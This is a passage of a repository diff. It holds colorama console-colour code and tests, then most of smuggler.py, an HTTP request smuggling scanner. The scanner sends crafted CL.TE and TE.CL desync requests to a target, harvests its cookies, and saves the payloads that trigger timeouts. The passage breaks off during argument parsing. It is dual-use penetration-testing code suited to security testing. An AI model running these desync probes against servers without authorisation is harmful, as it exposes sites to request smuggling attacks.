def testSetConsole(self, mockWin32):
|
||||
mockAttr = Mock()
|
||||
mockAttr.wAttributes = 0
|
||||
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
|
||||
term = WinTerm()
|
||||
term.windll = Mock()
|
||||
|
||||
term.set_console()
|
||||
|
||||
self.assertEqual(
|
||||
mockWin32.SetConsoleTextAttribute.call_args,
|
||||
((mockWin32.STDOUT, term.get_attrs()), {})
|
||||
)
|
||||
|
||||
@patch('colorama.winterm.win32')
|
||||
def testSetConsoleOnStderr(self, mockWin32):
|
||||
mockAttr = Mock()
|
||||
mockAttr.wAttributes = 0
|
||||
mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
|
||||
term = WinTerm()
|
||||
term.windll = Mock()
|
||||
|
||||
term.set_console(on_stderr=True)
|
||||
|
||||
self.assertEqual(
|
||||
mockWin32.SetConsoleTextAttribute.call_args,
|
||||
((mockWin32.STDERR, term.get_attrs()), {})
|
||||
)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
152
lib/colorama/win32.py
Normal file
152
lib/colorama/win32.py
Normal file
@ -0,0 +1,152 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
|
||||
# from winbase.h
|
||||
STDOUT = -11
|
||||
STDERR = -12
|
||||
|
||||
try:
|
||||
import ctypes
|
||||
from ctypes import LibraryLoader
|
||||
windll = LibraryLoader(ctypes.WinDLL)
|
||||
from ctypes import wintypes
|
||||
except (AttributeError, ImportError):
|
||||
windll = None
|
||||
SetConsoleTextAttribute = lambda *_: None
|
||||
winapi_test = lambda *_: None
|
||||
else:
|
||||
from ctypes import byref, Structure, c_char, POINTER
|
||||
|
||||
COORD = wintypes._COORD
|
||||
|
||||
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
|
||||
"""struct in wincon.h."""
|
||||
_fields_ = [
|
||||
("dwSize", COORD),
|
||||
("dwCursorPosition", COORD),
|
||||
("wAttributes", wintypes.WORD),
|
||||
("srWindow", wintypes.SMALL_RECT),
|
||||
("dwMaximumWindowSize", COORD),
|
||||
]
|
||||
def __str__(self):
|
||||
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
|
||||
self.dwSize.Y, self.dwSize.X
|
||||
, self.dwCursorPosition.Y, self.dwCursorPosition.X
|
||||
, self.wAttributes
|
||||
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
|
||||
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
|
||||
)
|
||||
|
||||
_GetStdHandle = windll.kernel32.GetStdHandle
|
||||
_GetStdHandle.argtypes = [
|
||||
wintypes.DWORD,
|
||||
]
|
||||
_GetStdHandle.restype = wintypes.HANDLE
|
||||
|
||||
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
|
||||
_GetConsoleScreenBufferInfo.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
|
||||
]
|
||||
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
|
||||
_SetConsoleTextAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
]
|
||||
_SetConsoleTextAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
|
||||
_SetConsoleCursorPosition.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
COORD,
|
||||
]
|
||||
_SetConsoleCursorPosition.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
|
||||
_FillConsoleOutputCharacterA.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
c_char,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
|
||||
_FillConsoleOutputAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleW
|
||||
_SetConsoleTitleW.argtypes = [
|
||||
wintypes.LPCWSTR
|
||||
]
|
||||
_SetConsoleTitleW.restype = wintypes.BOOL
|
||||
|
||||
def _winapi_test(handle):
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return bool(success)
|
||||
|
||||
def winapi_test():
|
||||
return any(_winapi_test(h) for h in
|
||||
(_GetStdHandle(STDOUT), _GetStdHandle(STDERR)))
|
||||
|
||||
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
|
||||
handle = _GetStdHandle(stream_id)
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return csbi
|
||||
|
||||
def SetConsoleTextAttribute(stream_id, attrs):
|
||||
handle = _GetStdHandle(stream_id)
|
||||
return _SetConsoleTextAttribute(handle, attrs)
|
||||
|
||||
def SetConsoleCursorPosition(stream_id, position, adjust=True):
|
||||
position = COORD(*position)
|
||||
# If the position is out of range, do nothing.
|
||||
if position.Y <= 0 or position.X <= 0:
|
||||
return
|
||||
# Adjust for Windows' SetConsoleCursorPosition:
|
||||
# 1. being 0-based, while ANSI is 1-based.
|
||||
# 2. expecting (x,y), while ANSI uses (y,x).
|
||||
adjusted_position = COORD(position.Y - 1, position.X - 1)
|
||||
if adjust:
|
||||
# Adjust for viewport's scroll position
|
||||
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
|
||||
adjusted_position.Y += sr.Top
|
||||
adjusted_position.X += sr.Left
|
||||
# Resume normal processing
|
||||
handle = _GetStdHandle(stream_id)
|
||||
return _SetConsoleCursorPosition(handle, adjusted_position)
|
||||
|
||||
def FillConsoleOutputCharacter(stream_id, char, length, start):
|
||||
handle = _GetStdHandle(stream_id)
|
||||
char = c_char(char.encode())
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
success = _FillConsoleOutputCharacterA(
|
||||
handle, char, length, start, byref(num_written))
|
||||
return num_written.value
|
||||
|
||||
def FillConsoleOutputAttribute(stream_id, attr, length, start):
|
||||
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
|
||||
handle = _GetStdHandle(stream_id)
|
||||
attribute = wintypes.WORD(attr)
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
return _FillConsoleOutputAttribute(
|
||||
handle, attribute, length, start, byref(num_written))
|
||||
|
||||
def SetConsoleTitle(title):
|
||||
return _SetConsoleTitleW(title)
|
169
lib/colorama/winterm.py
Normal file
169
lib/colorama/winterm.py
Normal file
@ -0,0 +1,169 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from . import win32
|
||||
|
||||
|
||||
# from wincon.h
|
||||
class WinColor(object):
|
||||
BLACK = 0
|
||||
BLUE = 1
|
||||
GREEN = 2
|
||||
CYAN = 3
|
||||
RED = 4
|
||||
MAGENTA = 5
|
||||
YELLOW = 6
|
||||
GREY = 7
|
||||
|
||||
# from wincon.h
|
||||
class WinStyle(object):
|
||||
NORMAL = 0x00 # dim text, dim background
|
||||
BRIGHT = 0x08 # bright text, dim background
|
||||
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
|
||||
|
||||
class WinTerm(object):
|
||||
|
||||
def __init__(self):
|
||||
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
|
||||
self.set_attrs(self._default)
|
||||
self._default_fore = self._fore
|
||||
self._default_back = self._back
|
||||
self._default_style = self._style
|
||||
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
|
||||
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
|
||||
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
|
||||
# and BRIGHT is overwritten by Style codes.
|
||||
self._light = 0
|
||||
|
||||
def get_attrs(self):
|
||||
return self._fore + self._back * 16 + (self._style | self._light)
|
||||
|
||||
def set_attrs(self, value):
|
||||
self._fore = value & 7
|
||||
self._back = (value >> 4) & 7
|
||||
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
|
||||
|
||||
def reset_all(self, on_stderr=None):
|
||||
self.set_attrs(self._default)
|
||||
self.set_console(attrs=self._default)
|
||||
self._light = 0
|
||||
|
||||
def fore(self, fore=None, light=False, on_stderr=False):
|
||||
if fore is None:
|
||||
fore = self._default_fore
|
||||
self._fore = fore
|
||||
# Emulate LIGHT_EX with BRIGHT Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def back(self, back=None, light=False, on_stderr=False):
|
||||
if back is None:
|
||||
back = self._default_back
|
||||
self._back = back
|
||||
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT_BACKGROUND
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT_BACKGROUND
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def style(self, style=None, on_stderr=False):
|
||||
if style is None:
|
||||
style = self._default_style
|
||||
self._style = style
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def set_console(self, attrs=None, on_stderr=False):
|
||||
if attrs is None:
|
||||
attrs = self.get_attrs()
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
win32.SetConsoleTextAttribute(handle, attrs)
|
||||
|
||||
def get_position(self, handle):
|
||||
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
|
||||
# Because Windows coordinates are 0-based,
|
||||
# and win32.SetConsoleCursorPosition expects 1-based.
|
||||
position.X += 1
|
||||
position.Y += 1
|
||||
return position
|
||||
|
||||
def set_cursor_position(self, position=None, on_stderr=False):
|
||||
if position is None:
|
||||
# I'm not currently tracking the position, so there is no default.
|
||||
# position = self.get_position()
|
||||
return
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
win32.SetConsoleCursorPosition(handle, position)
|
||||
|
||||
def cursor_adjust(self, x, y, on_stderr=False):
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
position = self.get_position(handle)
|
||||
adjusted_position = (position.Y + y, position.X + x)
|
||||
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
|
||||
|
||||
def erase_screen(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the screen.
|
||||
# 1 should clear from the cursor to the beginning of the screen.
|
||||
# 2 should clear the entire screen, and move cursor to (1,1)
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
# get the number of character cells in the current buffer
|
||||
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
|
||||
# get number of character cells before current cursor position
|
||||
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = cells_in_screen - cells_before_cursor
|
||||
elif mode == 1:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_before_cursor
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_in_screen
|
||||
else:
|
||||
# invalid mode
|
||||
return
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
if mode == 2:
|
||||
# put the cursor where needed
|
||||
win32.SetConsoleCursorPosition(handle, (1, 1))
|
||||
|
||||
def erase_line(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the line.
|
||||
# 1 should clear from the cursor to the beginning of the line.
|
||||
# 2 should clear the entire line.
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
|
||||
elif mode == 1:
|
||||
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwCursorPosition.X
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
|
||||
cells_to_erase = csbi.dwSize.X
|
||||
else:
|
||||
# invalid mode
|
||||
return
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
|
||||
def set_title(self, title):
|
||||
win32.SetConsoleTitle(title)
|
460
smuggler.py
Normal file
460
smuggler.py
Normal file
@ -0,0 +1,460 @@
|
||||
#!/usr/bin/python3
|
||||
# MIT License
|
||||
#
|
||||
# Copyright (c) 2020 Evan Custodio
|
||||
#
|
||||
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
# of this software and associated documentation files (the "Software"), to deal
|
||||
# in the Software without restriction, including without limitation the rights
|
||||
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
# copies of the Software, and to permit persons to whom the Software is
|
||||
# furnished to do so, subject to the following conditions:
|
||||
#
|
||||
# The above copyright notice and this permission notice shall be included in all
|
||||
# copies or substantial portions of the Software.
|
||||
#
|
||||
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
# SOFTWARE.
|
||||
import argparse
|
||||
import re
|
||||
import time
|
||||
import sys
|
||||
import os
|
||||
import random
|
||||
import string
|
||||
import importlib
|
||||
import hashlib
|
||||
from copy import deepcopy
|
||||
from time import sleep
|
||||
from datetime import datetime
|
||||
from lib.Payload import Payload, Chunked, EndChunk
|
||||
from lib.EasySSL import EasySSL
|
||||
from lib.colorama import Fore, Style
|
||||
|
||||
class Desyncr():
|
||||
def __init__(self, configfile, smhost, smport=443, url="", method="GET", endpoint="/", SSLFlag=False, logh=None, smargs=None):
|
||||
self._configfile = configfile
|
||||
self._host = smhost
|
||||
self._port = smport
|
||||
self._method = method
|
||||
self._endpoint = endpoint
|
||||
self._vhost = smargs.vhost
|
||||
self._url = url
|
||||
self._timeout = float(smargs.timeout)
|
||||
self.ssl_flag = SSLFlag
|
||||
self._logh = logh
|
||||
self._quiet = smargs.quiet
|
||||
self._exit_early = smargs.exit_early
|
||||
self._attempts = 0
|
||||
self._cookies = []
|
||||
|
||||
def _test(self, payload_obj):
|
||||
try:
|
||||
web = EasySSL(self.ssl_flag)
|
||||
web.connect(self._host, self._port, self._timeout)
|
||||
web.send(str(payload_obj).encode())
|
||||
#print(payload_obj)
|
||||
start_time = datetime.now()
|
||||
res = web.recv_nb(self._timeout)
|
||||
end_time = datetime.now()
|
||||
web.close()
|
||||
if res is None:
|
||||
delta_time = end_time - start_time
|
||||
if delta_time.seconds < (self._timeout-1):
|
||||
return (2, res, payload_obj) # Return code 2 if disconnected before timeout
|
||||
return (1, res, payload_obj) # Return code 1 if connection timedout
|
||||
# Filter out problematic characters
|
||||
res_filtered = ""
|
||||
for single in res:
|
||||
if single > 0x7F:
|
||||
res_filtered += '\x30'
|
||||
else:
|
||||
res_filtered += chr(single)
|
||||
res = res_filtered
|
||||
#if '504' in res:
|
||||
|
||||
#print("\n\n"+str(str(payload_obj)))
|
||||
#print("\n\n"+res)
|
||||
return (0, res, payload_obj) # Return code 0 if normal response returned
|
||||
except Exception as exception_data:
|
||||
#print(exception_data)
|
||||
return (-1, None, payload_obj) # Return code -1 if some except occured
|
||||
|
||||
def _get_cookies(self):
|
||||
RN = "\r\n"
|
||||
try:
|
||||
cookies = []
|
||||
web = EasySSL(self.ssl_flag)
|
||||
web.connect(self._host, self._port, 2.0)
|
||||
p = Payload()
|
||||
p.host = self._host
|
||||
p.method = "GET"
|
||||
p.endpoint = self._endpoint
|
||||
p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN
|
||||
p.header += "Host: __HOST__" + RN
|
||||
p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN
|
||||
p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN
|
||||
p.header += "Content-Length: 0" + RN
|
||||
p.body = ""
|
||||
#print (str(p))
|
||||
web.send(str(p).encode())
|
||||
sleep(0.5)
|
||||
res = web.recv_nb(2.0)
|
||||
web.close()
|
||||
if (res is not None):
|
||||
res = res.decode().split("\r\n")
|
||||
for elem in res:
|
||||
if len(elem) > 11:
|
||||
if elem[0:11].lower().replace(" ", "") == "set-cookie:":
|
||||
cookie = elem.lower().replace("set-cookie:","")
|
||||
cookie = cookie.split(";")[0] + ';'
|
||||
cookies += [cookie]
|
||||
info = ((Fore.CYAN + str(len(cookies))+ Fore.MAGENTA), self._logh)
|
||||
print_info("Cookies : %s (Appending to the attack)" % (info[0]))
|
||||
self._cookies += cookies
|
||||
return True
|
||||
except Exception as exception_data:
|
||||
error = ((Fore.CYAN + "Unable to connect to host"+ Fore.MAGENTA), self._logh)
|
||||
print_info("Error : %s" % (error[0]))
|
||||
return False
|
||||
|
||||
def run(self):
|
||||
RN = "\r\n"
|
||||
mutations = {}
|
||||
|
||||
if not self._get_cookies():
|
||||
return
|
||||
|
||||
if (self._configfile[1] != '/'):
|
||||
self._configfile = os.path.dirname(os.path.abspath(__file__)) + "/configs/" + self._configfile
|
||||
|
||||
try:
|
||||
f = open(self._configfile)
|
||||
except:
|
||||
error = ((Fore.CYAN + "Cannot find config file"+ Fore.MAGENTA), self._logh)
|
||||
print_info("Error : %s" % (error[0]))
|
||||
exit(1)
|
||||
|
||||
script = f.read()
|
||||
f.close()
|
||||
|
||||
exec(script)
|
||||
|
||||
for mutation_name in mutations.keys():
|
||||
if self._create_exec_test(mutation_name, mutations[mutation_name]) and self._exit_early:
|
||||
break
|
||||
|
||||
if self._quiet:
|
||||
sys.stdout.write("\r"+" "*100+"\r")
|
||||
|
||||
# ptype == 0 (Attack payload, timeout could mean potential TECL desync)
|
||||
# ptype == 1 (Edgecase payload, expected to work)
|
||||
def _check_tecl(self, payload, ptype=0):
|
||||
te_payload = deepcopy(payload)
|
||||
if (self._vhost == ""):
|
||||
te_payload.host = self._host
|
||||
else:
|
||||
te_payload.host = self._vhost
|
||||
te_payload.method = self._method
|
||||
te_payload.endpoint = self._endpoint
|
||||
|
||||
if len(self._cookies) > 0:
|
||||
te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n"
|
||||
|
||||
if not ptype:
|
||||
te_payload.cl = 6 # timeout val == 6, good value == 5
|
||||
else:
|
||||
te_payload.cl = 5 # timeout val == 6, good value == 5
|
||||
te_payload.body = EndChunk+"X"
|
||||
#print (te_payload)
|
||||
return self._test(te_payload)
|
||||
|
||||
# ptype == 0 (timeout payload, timeout could mean potential CLTE desync)
|
||||
# ptype == 1 (Edgecase payload, expected to work)
|
||||
def _check_clte(self, payload, ptype=0):
|
||||
te_payload = deepcopy(payload)
|
||||
if (self._vhost == ""):
|
||||
te_payload.host = self._host
|
||||
else:
|
||||
te_payload.host = self._vhost
|
||||
te_payload.method = self._method
|
||||
te_payload.endpoint = self._endpoint
|
||||
|
||||
if len(self._cookies) > 0:
|
||||
te_payload.header += "Cookie: " + ''.join(self._cookies) + "\r\n"
|
||||
|
||||
if not ptype:
|
||||
te_payload.cl = 4 # timeout val == 4, good value == 11
|
||||
else:
|
||||
te_payload.cl = 11 # timeout val == 4, good value == 11
|
||||
te_payload.body = Chunked("Z")+EndChunk
|
||||
#print (te_payload)
|
||||
return self._test(te_payload)
|
||||
|
||||
|
||||
def _create_exec_test(self, name, te_payload):
|
||||
def pretty_print(name, dismsg):
|
||||
spacing = 13
|
||||
sys.stdout.write("\r"+" "*100+"\r")
|
||||
msg = Style.BRIGHT + Fore.MAGENTA + "[%s]%s: %s" % \
|
||||
(Fore.CYAN + name + Fore.MAGENTA, " "*(spacing-len(name)), dismsg)
|
||||
sys.stdout.write(CF(msg))
|
||||
sys.stdout.flush()
|
||||
|
||||
if dismsg[-1] == "\n":
|
||||
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
|
||||
plaintext = ansi_escape.sub('', msg)
|
||||
if self._logh is not None:
|
||||
self._logh.write(plaintext)
|
||||
self._logh.flush()
|
||||
|
||||
|
||||
def write_payload(smhost, payload, ptype):
|
||||
furl = smhost.replace('.', '_')
|
||||
if (self.ssl_flag):
|
||||
furl = "https_" + furl
|
||||
else:
|
||||
furl = "http_" + furl
|
||||
if os.path.islink(sys.argv[0]):
|
||||
_me = os.readlink(sys.argv[0])
|
||||
else:
|
||||
_me = sys.argv[0]
|
||||
fname = os.path.abspath(os.path.dirname(_me)) + "/payloads/%s_%s_%s.txt" % (furl,ptype,name)
|
||||
pretty_print("CRITICAL", "%s Payload: %s URL: %s\n" % \
|
||||
(Fore.MAGENTA+ptype, Fore.CYAN+fname+Fore.MAGENTA, Fore.CYAN+self._url))
|
||||
with open(fname, 'wb') as file:
|
||||
file.write(bytes(str(payload),'utf-8'))
|
||||
|
||||
# First lets test TECL
|
||||
pretty_print(name, "Checking TECL...")
|
||||
start_time = time.time()
|
||||
tecl_res = self._check_tecl(te_payload, 0)
|
||||
tecl_time = time.time()-start_time
|
||||
|
||||
# Next lets test CLTE
|
||||
pretty_print(name, "Checking CLTE...")
|
||||
start_time = time.time()
|
||||
clte_res = self._check_clte(te_payload, 0)
|
||||
clte_time = time.time()-start_time
|
||||
|
||||
if (clte_res[0] == 1):
|
||||
# Potential CLTE found
|
||||
# Lets check the edge case to be sure
|
||||
clte_res2 = self._check_clte(te_payload, 1)
|
||||
if clte_res2[0] == 0:
|
||||
self._attempts += 1
|
||||
if (self._attempts < 3):
|
||||
return self._create_exec_test(name, te_payload)
|
||||
else:
|
||||
dismsg = Fore.RED + "Potential CLTE Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n"
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
# Write payload out to file
|
||||
write_payload(self._host, clte_res[2], "CLTE")
|
||||
self._attempts = 0
|
||||
return True
|
||||
|
||||
else:
|
||||
# No edge behavior found
|
||||
dismsg = Fore.YELLOW + "CLTE TIMEOUT ON BOTH LENGTH 4 AND 11" + ["\n", ""][self._quiet]
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
elif (tecl_res[0] == 1):
|
||||
# Potential TECL found
|
||||
# Lets check the edge case to be sure
|
||||
tecl_res2 = self._check_tecl(te_payload, 1)
|
||||
if tecl_res2[0] == 0:
|
||||
self._attempts += 1
|
||||
if (self._attempts < 3):
|
||||
return self._create_exec_test(name, te_payload)
|
||||
else:
|
||||
#print (str(tecl_res2[2]))
|
||||
#print (tecl_res2[1])
|
||||
dismsg = Fore.RED + "Potential TECL Issue Found" + Fore.MAGENTA + " - " + Fore.CYAN + self._method + Fore.MAGENTA + " @ " + Fore.CYAN + ["http://","https://",][self.ssl_flag]+ self._host + self._endpoint + Fore.MAGENTA + " - " + Fore.CYAN + self._configfile.split('/')[-1] + "\n"
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
# Write payload out to file
|
||||
write_payload(self._host, tecl_res[2], "TECL")
|
||||
self._attempts = 0
|
||||
return True
|
||||
else:
|
||||
# No edge behavior found
|
||||
dismsg = Fore.YELLOW + "TECL TIMEOUT ON BOTH LENGTH 6 AND 5" + ["\n", ""][self._quiet]
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
|
||||
#elif ((tecl_res[0] == 1) and (clte_res[0] == 1)):
|
||||
# # Both types of payloads not supported
|
||||
# dismsg = Fore.YELLOW + "NOT SUPPORTED" + ["\n", ""][self._quiet]
|
||||
# pretty_print(name, dismsg)
|
||||
elif ((tecl_res[0] == -1) or (clte_res[0] == -1)):
|
||||
# ERROR
|
||||
dismsg = Fore.YELLOW + "SOCKET ERROR" + ["\n", ""][self._quiet]
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
elif ((tecl_res[0] == 0) and (clte_res[0] == 0)):
|
||||
# No Desync Found
|
||||
tecl_msg = (Fore.MAGENTA + " (TECL: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \
|
||||
Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (tecl_time, tecl_res[1][9:9+3])
|
||||
|
||||
clte_msg = (Fore.MAGENTA + " (CLTE: " + Fore.CYAN +"%.2f" + Fore.MAGENTA + " - " + \
|
||||
Fore.CYAN +"%s" + Fore.MAGENTA + ")") % (clte_time, clte_res[1][9:9+3])
|
||||
|
||||
dismsg = Fore.GREEN + "OK" + tecl_msg + clte_msg + ["\n", ""][self._quiet]
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
elif ((tecl_res[0] == 2) or (clte_res[0] == 2)):
|
||||
# Disconnected
|
||||
dismsg = Fore.YELLOW + "DISCONNECTED" + ["\n", ""][self._quiet]
|
||||
pretty_print(name, dismsg)
|
||||
|
||||
self._attempts = 0
|
||||
return False
|
||||
|
||||
def process_uri(uri):
|
||||
#remove shouldering white spaces and go lowercase
|
||||
uri = uri.strip().lower()
|
||||
|
||||
#if it starts with https:// then strip it
|
||||
if ((len(uri) > 8) and (uri[0:8] == "https://")):
|
||||
uri = uri[8:]
|
||||
ssl_flag = True
|
||||
std_port = 443
|
||||
elif ((len(uri) > 7) and (uri[0:7] == "http://")):
|
||||
uri = uri[7:]
|
||||
ssl_flag = False
|
||||
std_port = 80
|
||||
else:
|
||||
print_info("Error malformed URL not supported: %s" % (Fore.CYAN + uri))
|
||||
exit(1)
|
||||
|
||||
#check for any forward slashes and filter only domain portion
|
||||
uri_tokenized = uri.split("/")
|
||||
uri = uri_tokenized[0]
|
||||
smendpoint = '/' + '/'.join(uri_tokenized[1:])
|
||||
|
||||
#check for any port designators
|
||||
uri = uri.split(":")
|
||||
|
||||
if len(uri) > 1:
|
||||
return (uri[0], int(uri[1]), smendpoint, ssl_flag)
|
||||
|
||||
return (uri[0], std_port, smendpoint, ssl_flag)
|
||||
|
||||
def CF(text):
|
||||
global NOCOLOR
|
||||
if NOCOLOR:
|
||||
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
|
||||
text = ansi_escape.sub('', text)
|
||||
return text
|
||||
|
||||
def banner(sm_version):
|
||||
print(CF(Fore.CYAN))
|
||||
print(CF(r" ______ _ "))
|
||||
print(CF(r" / _____) | | "))
|
||||
print(CF(r"( (____ ____ _ _ ____ ____| | _____ ____ "))
|
||||
print(CF(r" \____ \| \| | | |/ _ |/ _ | || ___ |/ ___)"))
|
||||
print(CF(r" _____) ) | | | |_| ( (_| ( (_| | || ____| | "))
|
||||
print(CF(r"(______/|_|_|_|____/ \___ |\___ |\_)_____)_| "))
|
||||
print(CF(r" (_____(_____| "))
|
||||
print(CF(r""))
|
||||
print(CF(r" @defparam %s"%(sm_version)))
|
||||
print(CF(Style.RESET_ALL))
|
||||
|
||||
def print_info(msg, file_handle=None):
|
||||
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
|
||||
msg = Style.BRIGHT + Fore.MAGENTA + "[%s] %s"%(Fore.CYAN+'+'+Fore.MAGENTA, msg) + Style.RESET_ALL
|
||||
plaintext = ansi_escape.sub('', msg)
|
||||
print(CF(msg))
|
||||
if file_handle is not None:
|
||||
file_handle.write(plaintext+"\n")
|
||||
|
||||
if __name__ == "__main__":
|
||||
global NOCOLOR
|
||||
if sys.version_info < (3, 0):
|
||||
print("Error: Smuggler requires Python 3.x")
|
||||
sys.exit(1)
|
||||
|
||||
Parser = argparse.ArgumentParser()
|
||||
